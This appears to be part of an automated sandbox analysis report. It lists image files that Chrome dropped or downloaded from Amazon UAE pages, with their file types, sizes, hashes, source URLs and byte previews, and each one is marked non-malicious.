                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1A..Qa."...#2q....$Rbt...............................................!1.A.."2............?...D@...DD.J*....L.u..1.o...W.X=Q./.(.......2..W?..E.h..+.*c...,N<....:u?f..fN.K..^...E.rpB" ...""...." .B.(.oW_[b.U...n...p...m._....L...VW.z....|..V...f.K%F@.H&'K..v#..f...r.b...ed1......#].6X...$.s.lE..<.O....8`$....2....K.5U......X..[..$5N.i.:..e..7+q.....=.U.k..B.=.q.dpc.9.-.<.+`....d.R.tp...DD....D@.......5....0\.e.%.E..Q].......J.|.l...w/....B_...}4.5.-......<<.Q..u.....#h.2Z...*.(ie....q'..B..eg..g~.~......_.M...c../..4r.ER..rT.I.G0?6.x..o...s.[.$.o.o..v...<LY..h../.u.tT.A..c.>..{>u...DE..DD....D@...!HE.U.i...$.m..9#...]..7..1....$.l1R<..%.{.a.mp......s.z.M]......Be{....0:.....zK{....,.....X.K..*|I.{,...c..>_8....5..4..)%....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 343x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):19261
                                                                                                                                                                                                                                                                      Entropy (8bit):7.968085191012163
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:+kNa3ACiDzp98IVHlkwsT2dDA0xHsWf1o8tQo1J1A+MEJjcjI362Ji6S42Rh:+0j/DzpHVFFsT2dDALWf1oepAeJjB3cH
                                                                                                                                                                                                                                                                      MD5:58C5BCB897EBF4300C90E59AE42406C7
                                                                                                                                                                                                                                                                      SHA1:0CABF58C566B48DCC284F3121C9F7C662A7BEB69
                                                                                                                                                                                                                                                                      SHA-256:A8E63FFA12DFB54CC69AD68B5E7EF1641A1D8CE74F63D219AC8D3F3E7AAAA6C6
                                                                                                                                                                                                                                                                      SHA-512:ACDC40531601693C112F670D32CA01BB22BD4435C84B072A84AC120C61A3FF8ADF7A270E930D16979B633B0697B7D2D6A0028CAB167196F985B89E64D4735734
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........W.."..........5.................................................................R/..l&.0&.0&.<..j..j..j..k......@.R..Pw.K.`M.`M.y.`..`..`..`...Z}|~.a].....6z.."..6I!$...H.HI!$.'0.M..)w..>..&UpX .(k$..NxI$$..rq9....9.{@..Z..8.{<..%..I!$.3.s8.B..mje.+..>wZ3.......>y..!Q..f3.O.......j ..Y..F!.3.s...0.YO>..@.:..$.0..8.E...4..je..P.....Y.:..k.w.R..&.......a25.....b...,..|3...YA..~m.+...`n.t.%.O-.KQ..k.....j.._.&.....u.U....3L...r{...b.\....~.f=PY...j.zgb.D:*G8A...U3..E-.X...p..=|.<...['...q{..U.yu._n&..o:w........*.|.d..~..m..;...'.PM...Y8;....kd ~...HwX;.i.....$T.........1..$TK....9.........".=....g.fUk..;...V..lb....*.........(/^.<.\...,.[e.[...<.f.]6%8.Tc..k5.`....0....d...9.....R..w.....T[o.{!.S)....]F.U..sn..e7...x.fT-.>.(..ZvKx.M:..6m..Qy...G.D.v.S..u..../.+-...k.[i7.V....h....<+v.X.wB@....gT
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):13218
                                                                                                                                                                                                                                                                      Entropy (8bit):7.864034228159954
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:E++Fig5KfN74L1XzqzZgJXZiWGqG2KxKne1YxBU7YlpWnFGes8T8squWESbljEi2:7+04xXVX8YrBUMbUFGes8osquaowQ5EY
                                                                                                                                                                                                                                                                      MD5:EFFFF114D0586635AFBBA9DF43E7CB5B
                                                                                                                                                                                                                                                                      SHA1:77B21281CCA6A50FB939E2D58D82A626A88E4CBA
                                                                                                                                                                                                                                                                      SHA-256:CA262FCFBCE803D40BBA897B0DB44BA02454A6ADE29CB98279BDC5D1EF77558F
                                                                                                                                                                                                                                                                      SHA-512:D3B4EE80987D0B8311652F7C9E3068157E351EFAC356FF3B2B0485C905296E07AE04D8327468CF95885D2278BCA9EBE6161D0E6A9C2B3DB0BAD29EA9B2269C8A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/sash/MV5yNztdnPUc5FB.png
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............$....8PLTEGpL.y!.y!.y!.z".y!..%.:.o<..z".{#....^.J....z .......y!....z!.y!.....z"......ossnrrQegJNNAKLIMM[^_JNNIMM....tP.........OSS..........GLMJNNBFFJNNJNNINN...JOP...JNN...~.....JNNIMM...IMM...................x..~.pss.q...........y!.{".z!...z".........z"..&......G..C...y!.y"..8.z!.y..:..9..9..._.L6.....}b.......htRNS.?.. .....o..........`...Q....>. ..............Kt............^..................w...H.f.................s....1.IDATx...E..0.CQS.a...s.Q.....hW...i.....B....5....;`...6......w.{.....:......x......5.x...J.R.f!..)...i.<.\$-..M.)...i.<T".8....5.x.4.NDB..u..#...6.B+V;+%.._......D.Ke....o.{E.1.<.M.G......4.......u..p...4'..p.....416$8q...)...B...B..C .R.K.~...G.=H..._.3......AS..o..8Bi....KW.s...Ei).~f...I..I.g......w.z.......i.k..,......h,......>.2.~....}iT..}*)..-......Os..S&..P{i..(8.Z....$.8....YJ...+.K/5......."...}:P...P{....g...4#.|.3v`..SHruI.PA..C~~.6..).Z].S*(..pDw.....q........D..ZY...,....\..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2435
                                                                                                                                                                                                                                                                      Entropy (8bit):7.758972943518561
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0r6lrE9CZTBH4kXXsFd0aBzPacvj/pGUnD+OVbK:TsCfBHizS8j3nHbK
                                                                                                                                                                                                                                                                      MD5:0F23329CFBCCCEF7F1F761A4DD101445
                                                                                                                                                                                                                                                                      SHA1:885A686AAF453B4994410DCFE4074402F0EE89C5
                                                                                                                                                                                                                                                                      SHA-256:45C12CC0FD3E40394DE45770221E50489F32B8B8145F5587C643FC9F8E8612B7
                                                                                                                                                                                                                                                                      SHA-512:441EA68739A45C35EBAD77FFD20915289ECBDF1E9627B8E5B0C3E0D161EC7073DCC5354CDEC13851EA5047762CC049181AEF2BD6EE0A364521ED860B4F1DF4F2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-vubbe_372x232_ae-en._SY116_CB643136714_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!..1AQ."aq.....#Rr.2b...$C..B................................................1!"A.Q............?..." ...""....%u..u1@....9.....1.....A.6..L..#...B.z7./.V........&.D.""...." ...""...." ... D@2...V8.$....wM..d...=.w.....4.Y.:.........w..M%..n.+~f...c.BN...@5.|..?.F._.."^Q.[.s...S[.?3.../. ....4..A..).>...h5-.X. ...V.,..<K.&.S.M~.?.....}\..J....>lK... ....d....H.~....3........L..C.W...O.\...3G%KV..DD..D@...DD....D@."1...V.+.......E...xe..#l.E.S....O...nV......_...j.......q..I....=I^{.......\~B....ip.b.uj..|G.*~D.$-Q....s^.%....Ku...U*.2!.ONzr..{.....WG........u.s...{...b...|D...~.EF.O..M.;...\..*NS...q-...{4...w'5..+...xA.q...c?.(K$.c.sZ....fF.D.o[.;@j.p.....i...+..N.{.3*.i........kS_..#.(7..j6k....FAL.........<F0fs.Y..1i.....R.v..m.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2354
                                                                                                                                                                                                                                                                      Entropy (8bit):7.7983762557864855
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0r8ugddGbnVg5drcspO38av1A43N+klwuwmpCVBo:Tj1rcspOMb433P1iBo
                                                                                                                                                                                                                                                                      MD5:8E65C5BF438DA029BEED5759985ED82F
                                                                                                                                                                                                                                                                      SHA1:47C01210115A756F85B952564D2AF49FC170DB10
                                                                                                                                                                                                                                                                      SHA-256:39495131401B71CA51F5B4D4A1746037A0652EC179D51E0D228933D0AE8145B7
                                                                                                                                                                                                                                                                      SHA-512:B93002AD79E156246AF9A91F6829B55062BD786A08C47D47F031C65EB717370082B131BC65620A94ED4C79AA206961F312B69D2DE92A4D4E6CA401DE069493E0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_Manual_1224505_1174644_UAE_3096775_153x125_2X_en_AE._SY116_CB431807455_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1AQ..Ua...."235BRTq........#Crt....$%b....................................................!12Q"...3Aa............?.........DD....D@...DD....D@...D^..$.......q..ZR.ed2..=...6....$.w......Eu..YH....I.f.T..qJ>f..T-g.K.[.....9..H....}........k..}......>.{$tQ..R.?W7.o.V...tC7...9mOC..d..'...?yM).\.S..?.w...S..z...bE.M.....yf?.u.3_.Q.<3F.$.f?K.&..@G......!../.e." .eC\._.j.5......u..._..8423..........._?]'.9d...AL."o...d.3...3.9.L.I.T.6.J.>.I..C#.E.......PW]F......b/...].[V.....l.lT.6..9V..S...j..5f.+n).....Os.e.PS$`.........e.L..../~i...Al....:q.u...^.1K1.&?..}e.....G/3.lA.2.$..vo''...SPW '...vU.h.N..K...A..I0.5N...../1E#..%.A8.P..$..N.M.e......-.f...F...\^....S.....<...`..L_.,.F75.g.G...R.$L.&{.h..#w2.g.=..?......$...#.s...z....qk)d.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 64 x 64
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):8865
                                                                                                                                                                                                                                                                      Entropy (8bit):7.881132938956866
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Y1cVEDjZAvmuIcq09pk4IYIhmJPjfr+UYN36:Y64jGeMpk4IYDJPjyUYd6
                                                                                                                                                                                                                                                                      MD5:B05B81750794CA693E9589C0A171634F
                                                                                                                                                                                                                                                                      SHA1:FA91375275E3E1C8FCD8F79BCAE5D85593A33C67
                                                                                                                                                                                                                                                                      SHA-256:FF24D4B094AB1896672F4C8D387150C74BBB2493F7D01BEA7C87247AA0AB3BB5
                                                                                                                                                                                                                                                                      SHA-512:0C1FBBBD92EAD677C12E4B8CC40239FF66D90A899180C0816A4827F982CB45DD259D24BBC08C34FF737BDE5D3BA3638FF99CA33F77D7C0D640B6970969D3B5EB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/39/personalization/ybh/loading-4x-gray._CB485916920_.gif
                                                                                                                                                                                                                                                                      Preview:GIF89a@.@............................!..NETSCAPE2.0.....!..XMP DataXMPa1a8-9458-1177-8dcc-94086be1eca9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.!.......,....@.@....h..#.@*)..1..`.P.v.......p...e..}...7.Zm.[....O&$..#J...HN.4%=...F`H..n..4<+g+....F...I....u.ayn=>.u.K.dTw...Ln..w..u.1c.}...u.~.I...;G`..p....]........j..-....@j.My....R...$$....R.4.p.0..........G..p..!]}....0.vxq...]..(T..`...r.. ."...Z,c.@.....P..%.c.w..t..g`...Q..p.C..+M.."fK^.r..Q.M.6...S..FE..........*...Uo....J..>.v`..+W.:.,{....i.bl{...j..(.....w=...o1.p=H..vC.]...&....;.8f\.... .T.m.....$..\.....W;F..4h&.Y..3..*.so..-B..#...Z....uB.....KAd...`.w....|x.....?.||...O..9.w.Y..O..m......x..d.~.R.To.IvI..!.......,....@.@....x....H..8.3...TP[i2Q....g...8..[..-.....+...a.fDj............8....+.....&Ue.....a.e....`.n;t@z.f........jw.\.....v?\f...(z.z........k....H.........~@...G........v.....^...H.....N......e......a..........e.....e.......W......,Pp.A........:|..2,(..c.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 628x640, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):23333
                                                                                                                                                                                                                                                                      Entropy (8bit):7.939135138578168
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:LKSK2raAji91KpTyGYgggONpdlZfpHDvyZCgoYkEj5VPoVW57zU5G:LKSKoa3+pTyGNggONpHZhHryZtoYkq51
                                                                                                                                                                                                                                                                      MD5:07F2566303E7F7FF4C4BD37CCE002747
                                                                                                                                                                                                                                                                      SHA1:78301FD62825198ACA9CFE02514CC57833FD56C2
                                                                                                                                                                                                                                                                      SHA-256:4848F1AEDB07D2CE4F0A899F8832F3F1C3DA82832CEE35CB0432B2D9738767BA
                                                                                                                                                                                                                                                                      SHA-512:59395B1FF134D8F93B70CEE2C51B3CA281CC1E862A944FCF879DF72BA989B6300775AE5EE2A90CE51C0A783A8A7C3F5BF79914159238CA287AE6FDFED6A8B6A2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.........................!.....+....'...'.''.#'##,'!!',#');)0+5,)8););::=BC;'BZ..........!8'.,:0.)E:C,:=::+L:C8:#;:,55,,0)0:,==;.+=8'Q+,':8B5'=H........t.."..........3.....................................................................c.OP.....<......h..;.z......J...................*.....w...b........c...!.t..G.....+.....].oy....r.....{..................[t...V..-..f>m._.9.}m3...0...OS-.. .......9Z|..h...:.j.;_...=.1..}4..hc}.{....7Zo...+.=X{Q.y....#/3K..|...q;Z.5..4B...7....v..u5...-.O;....>.....y.:.3.]/9..>.Ms.......?....GS8...c"8.5...h.......2.1............<_..X.||...x,..{.?.....lh.|.:.>W....vk.V.Z...k...5..a1.....1...=._o.x...z..=<. .......s...8.OWe...:M[j.\....,R...WMIOch.]...._................7O.Sr.7....y......GF.zG.=N.m..y.....\....s........y.7.t..=w:...K..tsu.....Ld....9...{.<W..y}\m..T....Wf.i.....6..a.[R...^_{..._o...=>.z<.....k|./...U....0......c.....S.u;..[W:..gY....z.<WT.{.Sw|;:.W..]m8.KWq<.1..Q...e......_...*..._.^.L...]..Z...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26ctb%3D1%26sc0%3Daod-ingress-assets-load-time%26bb0%3D11245%26pc0%3D11245%26ld0%3D11245%26t0%3D1724264942431%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:11245
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 201x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):19273
                                                                                                                                                                                                                                                                      Entropy (8bit):7.973432536286121
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:/KDlPG6oK2zvug88gdm+gsMrucQ2BoLlynZ4MRaHoUs5YQZYa:/KDlPJ2zvKPXrF2oaKrH0YQZP
                                                                                                                                                                                                                                                                      MD5:2230E766B61CF1B0FEEA38690E37FEEA
                                                                                                                                                                                                                                                                      SHA1:65EE979142D99FFF02DFE5E95281C22399435885
                                                                                                                                                                                                                                                                      SHA-256:C09232A9BC8AA4E63794CE1F7D3DDB2D0C17013AFEAD1F3AC5A180407E38A0B0
                                                                                                                                                                                                                                                                      SHA-512:59DAFAE41BDB6E230FC6C03B92F6A7D0D2C56010EF260D5ABC7BA55A91F9E75F08561AD6FACE5AF18896B6B6EE2027344C05833A917FA6141FB3BAE582774969
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..............................................................!..1A"Q.2aq...#B....3Rb..4Srs...$5Ct....Dc..%T.....................................................!1A.."2Qaq.#B.........R..3c............?.........z..c...W.1.~._.8.W..t&h..OI..5.$.....7.('..cm.!21.0..F$*.q....TF.]G.c..._....5.1.N...~......4.;sT{.#...m..F....E.!.....au-H].Z..7a....5...C..s.......78....0]...OB1..NJ..>.Ex.m.]...w...\|1 ...t'.`.N>.t..T.............0].....~.D..1..#..'S..#.bqcM....K...h"...9.c......N.r3(..Z...Z.....:.T...N..}......1..J.Ep&Z........N-3...c...8.*.p{.B.h.....nv.1.'.'..`B....1:c.o...{cr...=.|..:W..).b.......bUUrS.df..7....!.bz.X.m.........nv.c..`_P.m.6......\.$...@...d-.Q.......${.....UeEP}.H_.w...w..(+.....~..d)R.....GJ].0...>K^.bAP=....Ty.J.srv..^......:...0.BIp>6.r...!..v.t/EI...JT..X..a.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5865
                                                                                                                                                                                                                                                                      Entropy (8bit):7.557711722902898
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:1ryhNb3GQ23w5zgAHJ6fCLsGvwCwFyyyyyyyyyyyyyyyyyyyyyy/9vFP6DktDuIc:1+h93P236zf6fEcyyyyyyyyyyyyyyyyk
                                                                                                                                                                                                                                                                      MD5:09AC2B346659BA2CE0D8269AD2F92938
                                                                                                                                                                                                                                                                      SHA1:5A43FAFD61691108C0242E5480E877EC0F3150F1
                                                                                                                                                                                                                                                                      SHA-256:CAE79E0FFBF6664010022948D4E135918DE39DE8469FF6C379B233997D8604FF
                                                                                                                                                                                                                                                                      SHA-512:5F17207BF1000B4832B4D015ABCE35411B1D5436A561F1CA813C76D5BC2FBDAC7748716332FBF7B7BCD844982912CA2A84AB7DE732CE9DFF91DC72FEEB930CF5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Desktop-Outdoor-sports-1500x80.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."...............................................|.......................g.........................>...........<< ..X..<..............|>.........\<}.J._k..N..u_...........my....l.r"}............|>........._.:...5opS.g....GS...c...]e......Y...............3..............^\....:.C..........s.v.k...!VWb...-*.*........................_.g..*...p6.|H......._z?...M\...[;.I`1...........|............-z.....................................................................................................................R.r,@....`....t.r.:U......X.....%K..b......@....................................................................>wG.S....n7...............x.z5.g... ...........9.-=....:.....................-..........................2.`..!56.... 04p7.........."+r.J.J.J.J.J.J.J.J.J.J.J.J.J.J.J.J.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3695
                                                                                                                                                                                                                                                                      Entropy (8bit):7.651382952207194
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TIL6LmlLUtDDfBCKhc5at0th/8K87kpobu4Plc6sS9b2gSr:UL6ClL4XBD0t/828/tG5r
                                                                                                                                                                                                                                                                      MD5:B81C5B4480229D63D9FF5C774A48295C
                                                                                                                                                                                                                                                                      SHA1:DA40146DEC9C0BD435FD921B25C748E9E3FEDCDC
                                                                                                                                                                                                                                                                      SHA-256:CAE40D63B00DB82B8195DED00FD387D3A9CA86AE0849EABE4A43320BD441CF5D
                                                                                                                                                                                                                                                                      SHA-512:A35ECA0D780875607D9FB31BCD9EE15D1186B05C212C7B7371AD66201144B684C0E22D2AA21513A786EAAF54949E0895EEC0979B630FBD122A8DF200EF294175
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.......................................................................................................~...sF..6..(..............Z....4/g)..hY.\.........sU%..W...n......:.Z'...J.3......s..G...+p[..........P:.B/.U..L.*.......a.......I.._...q......l....H..UiU..e.X.\.../..N38.....^k..=.6.@......3...l"..{VM...w.......g.9.}...Z.=~..5........3...........k../.......mn..FS.......@......2.G..[.....'8....?..}9p='C.\.W..g.h.d.....C.{x.".WV-u4...7"g..g9...[...........!..........&.=u.S..7.ar.zkY<o.6.o.......................................................... !234@"1..#p..$AB...........<"..P..A6..K..N.M._..d..5b.U......U.k9..g%..>q..#...._.;3m..!...Uy.i....+....y..r...b.....,..?.7.+tc..2......1|.&.mO.mM.A...|.*.d..d..-![.pA.g/.....O.mM.t.z..A}R2..reW..>.O...e.2.........[.q.d...t..\..FU...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D4987%26pc%3D7783%26at%3D7783%26t%3D1724264961819%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D15149894031%26tid%3D3YMHCN1ADEMYQEW81YBE%26aftb%3D1%26lob%3D1:7782
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):12602
                                                                                                                                                                                                                                                                      Entropy (8bit):7.91213063092888
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:YMYnJzuegeT+jgXEuddddddddd13MTj2mw0rGQg2BLUPeZp6F03raqm7sbe+6W6q:q9T+cUY3MTaZIg21xiqm4S+6W66b
                                                                                                                                                                                                                                                                      MD5:8469D7A400DFEC81B5D4B9EA31CD92DD
                                                                                                                                                                                                                                                                      SHA1:11812426128F185C6F0392ECB2FB61AA550005DF
                                                                                                                                                                                                                                                                      SHA-256:862666125B9D2A84160C863A1E2F31BBEDA84A39EF7A252AA675729A35301055
                                                                                                                                                                                                                                                                      SHA-512:DB62D128F0A4086A3E63243B1B7CA0F48DF8600954C5EDE667DF2C2F4C9BF0BB623B7D1F92F32E293C46E689B6CB7E6539E3EEE7E4C71B26EBBC26F1FBD2FCF5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259756_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................}.....3.C<.e...%....................6.e.b|.__/.o.$....W#...V...:.J................q.pS........;.k.]....%.......8..v.#.D<.......k?%.Yz`......;x...~so;`......k.....a......5..tMXg...{f&..}...y.p....'.M................$...0y.$ewg>Z3~Wg................!.ro....v.=...!..................5E.*.G...).*q...[...Z......r2.j........D...+.s...Cg8..7..o........?..w...?.#.?.....[.....s....O=.-z.\.h.Y 6n..3...........*.]rZ#'@(.......+.#......t.X..|Q....>.3........%#..l...r.X.u2.......[..4.....|............M.q..7m'-.1.L..........,Ti.P......r4.i......}%.Xz.....O}....C....C..P....c..c^....G4....N>.dF9.}W3.zVq..rE.~'.!g.m.a...........).)...] ....i..:.}.7....).n...=.b=.I..1.6d...e.Z.-./..T....%%!.6.P.0.{.1.@........x9
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 158x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):13231
                                                                                                                                                                                                                                                                      Entropy (8bit):7.960347291854105
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:Xy7PxHmkIXFmDqEWnbTQBl8dBEZOrNTOFa/EWHQC:ibxHmB13EmbTfEg86T
                                                                                                                                                                                                                                                                      MD5:E2EB60631B1046DAECA0933169AEFE58
                                                                                                                                                                                                                                                                      SHA1:3AA55D763730C2EB1BA95EBFB2428D4E0B4E6DBC
                                                                                                                                                                                                                                                                      SHA-256:8C5D477D61B7A9382CC08151B0C69B22D89A19C050E945179A7FBCFE83B7F631
                                                                                                                                                                                                                                                                      SHA-512:84B26FB0CD7E1DA316BC93F21B341608DC517C516A22A4EAA99B034BA4118C46548EDBB7D804AD221E21C2132C8068691BAF148C1D1D992150AB18E87BB0BEC1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71vUumKmvkL._AC_SY200_.jpg
